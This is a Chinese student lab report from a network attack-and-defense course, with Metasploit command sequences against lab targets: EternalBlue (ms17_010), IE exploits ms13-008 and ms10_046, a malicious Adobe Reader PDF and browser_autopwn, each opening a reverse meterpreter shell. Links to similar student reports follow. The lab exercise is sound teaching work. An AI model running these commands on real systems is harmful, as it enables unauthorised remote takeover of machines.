1. 实践内容


本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,如ms08_067; (1分)

1.2 一个针对浏览器的攻击,如ms11_050;(1分)

1.3 一个针对客户端的攻击,如Adobe;(1分)

1.4 成功应用任何一个辅助模块。(0.5分)

以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

2.实验步骤及结果

2.1主动攻击实践,ms17_010


靶机: Windows Server 2008 R2 (x64)

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

使用ms17_010模块: msf > use exploit/windows/smb/ms17_010_eternalblue

设置payload:payload windows/x64/meterpreter/reverse_tcp

设置ip地址 set lhost +攻击机ip地址 、set rhost +靶机ip地址

输入exploit进行攻击



攻击成功:

2.2.1 针对浏览器的攻击,ms13-008


靶机:IE 8 on Windows XP SP3

使用ms13-008模块:use exploit/windows/browser/ie_cbutton_uaf

设置payloadset payload windows/meterpreter/reverse_tcp

设置攻击机IP地址 set srvhost +攻击机ip地址

设置lhost set lhost +攻击机ip地址

exploit

在靶机ie 8 浏览器输入url链接

返回攻击机输入sessions -i +session id 进入meterpreter。

2.2.2MS10-046 (唯一,成功)


在攻击机kali输入msfconsole进入控制台

使用ms10_046模块

set SRVHOST +攻击机ip

设置payload ,tcp反向回连

set LHOST +攻击机ip

exploit 攻击

靶机访问url链接,弹出对话框点击“允许”,会弹出一个攻击者IP的目录,其中有一个“快捷方式”的图标,双击快捷方式,攻击机方显示成功建立会话。

使用sessions -i 1选择会话,攻击成功。

2.3. 针对客户端的攻击, adobe_toolbutton


靶机:Windows XP / Adobe Reader 9

使用adobe_toolbutton模块:use exploit/windows/fileformat/adobe_toolbutton;

生成攻击文件msf.pdf;

将文件传给靶机;

输入back返回;

设置监听程序use exploit/multi/handler;

设置payload set payload windows/meterpreter/reverse_tcp;

设置攻击机IP 地址;

输入run进行攻击;

当靶机用Adobe Reader 9 打开msf文件时,攻击成功。

2.4 成功应用任何一个辅助模块 browser autopwn


靶机:IE 8 on Windows XP SP3

•输入use auxiliary/server/browser_autopwn

•设置 payload



设置攻击机端口号

设置set LHOST 192.168.1.107

设置URIPATH

输入exploit进行攻击

靶机用浏览器打开url链接

输入 session -i 1成功获得权限

2 报告内容:


2.1.基础问题回答


用自己的话解释什么是exploit,payload,encode。

exploit:是攻击者利用靶机的漏洞进行攻击的一个过程。

payload:是攻击者为成功地实现对靶机的攻击,需要在靶机上执行的一段代码。

encode:是为了能够使靶机顺利的执行恶意代码,利用encode对payload进行的加工。

2.2.实践总结与体会


本次试验我先尝试攻击了中文版的win2008,winXP,win7这三个版本的系统,但是除了使用win2008可以顺利的完成第一个主动攻击外,剩下两个都没用。最后我还是换了一个英文版的winXP才顺利的完成了接下来的任务。

2.3.离实战还缺些什么技术或步骤?


我认为我现在只能攻击一下微软已经放弃打补丁的winXP,偶尔运气好还可以成功地攻击win2008和win7,等着微软什么时候放弃了给win7打补丁,我再试试能不能用现有的工具攻破win7(还是得说挑一些win7中打补丁少的)。虽说现在使用win7的还有很多,但总的来说现在已经普遍在使用win10了,而我们攻击的还只是旧版本的系统,有些跟不上时代了,更别说实战了。

2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用的更多相关文章

  1. 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用

    - 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...

  2. 20155226《网络攻防》 Exp5 MSF基础应用

    20155226<网络攻防> Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就 ...

  3. 20155318 《网络攻防》Exp5 MSF基础应用

    20155318 <网络攻防>Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码传 ...

  4. 20145236《网络攻防》Exp5 MSF基础应用

    20145236<网络攻防>Exp5 MSF基础应用 一.基础问题回答 解释exploit,payload,encode是什么: exploit就是负责负载有用代码的交通工具,先通过exp ...

  5. 20155301 《网络攻防》 Exp5 MSF基础应用

    20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标 ...

  6. 20155321 《网络攻防》 Exp5 MSF基础应用

    20155321 <网络攻防> Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode 关于exploit,我觉得exploit是利用一些工具 ...

  7. 20155338 《网络攻防》Exp5 MSF基础应用

    20155338 <网络攻防>Exp5 MSF基础应用 基础问题回答 1. 用自己的话解释什么是exploit,payload,encode? exploit将真正要负责攻击的代码传送到靶 ...

  8. 2015306 白皎 《网络攻防》Exp5 MSF基础应用

    2015306 白皎 <网络攻防>Exp5 MSF基础应用 一.基础问题 用自己的话解释什么是exploit,payload,encode. exploit指由攻击者或渗透测试者利用一个系 ...

  9. 20155334 《网络攻防》Exp5 MSF基础应用

    一.基础问题回答 解释exploit,payload,encode是什么: 项目 作用 exploit 是负载有用代码的交通工具,让代码到达目的地,并作用 payload 是有具体功能的代码,能够完成 ...

  10. 20155211 网络攻防技术 Exp08 Web基础

    20155211 网络攻防技术 Exp08 Web基础 实践内容 Web前端HTML,能正常安装.启停Apache.理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML. We ...

随机推荐

  1. Mac_安装Homebrew以及Maven

    Mac OSX上的软件包管理工具,安装软件或者卸载软件. 打开终端输入(如不行,可参考homebrew官网): ruby -e "$(curl -fsSL https://raw.githu ...

  2. shell-特殊变量列表

    特殊变量列表 变量 含义 $0 当前脚本的文件名 $n 传递给脚本或函数的参数.n $# 传递给脚本或函数的参数个数. $* 传递给脚本或函数的所有参数.有引号则引号内,作为一个参数传入. $@ 传递 ...

  3. Python: map() and reduce()

    map()函数接收两个参数,一个是函数,一个是序列,map将传入的函数依次作用到序列的每个元素,并把结果作为新的list返回. 举例说明,比如我们有一个函数f(x)=x2,要把这个函数作用在一个lis ...

  4. NoSuchMethodError 问题

    最近maven升级到gradle后,总是报NoSuchMethod error.然后 ,报错的类确实是有这个方法,一切看起来都没有问题.那么运行时jvm到底加载的哪里的类呢?有没有相关的命令可以查询, ...

  5. 输入URL地址到页面加载完成 过程

    在浏览器的地址栏中输入URL地址"http://www.gacl.cn:8080/JavaWebDemo1/1.jsp"去访问服务器上的1.jsp这个web资源的过程 1.浏览器根 ...

  6. [strongswan][autoconf][automake][cento] 在CentOS上编译strongswan git源码时遇到的autoconf问题

    编译strongswan的git源码问题 1. 概述 首先,我们想要通过源码编译strongswan.当满足以下条件时,通常你会遇见此问题: 源码时通过git clone的得来的,而不是官网下载的源码 ...

  7. 推送测试,生产环境无法打印log获取deviceToken,可以通过弹窗获取deviceToken

    z- (void)application:(UIApplication *)application didRegisterForRemoteNotificationsWithDeviceToken:( ...

  8. Python初始环境搭建和Pycharm的安装

    首先我们来安装python 1.首先进入网站下载:点击打开链接(或自己输入网址https://www.python.org/downloads/),进入之后如下图,选择图中红色圈中区域进行下载. 

  9. 博客搬家 https://hanwang945.github.io/

    博客搬家 https://hanwang945.github.io/

  10. CF1139D Steps to One

    题目链接:洛谷 这个公式可真是个好东西.(哪位大佬知道它叫什么名字的?) 如果$X$恒$\geq 0$,那么 $$E[X]=\int_0^{+\infty}P(X>t)dt$$ 呸,我什么都没写 ...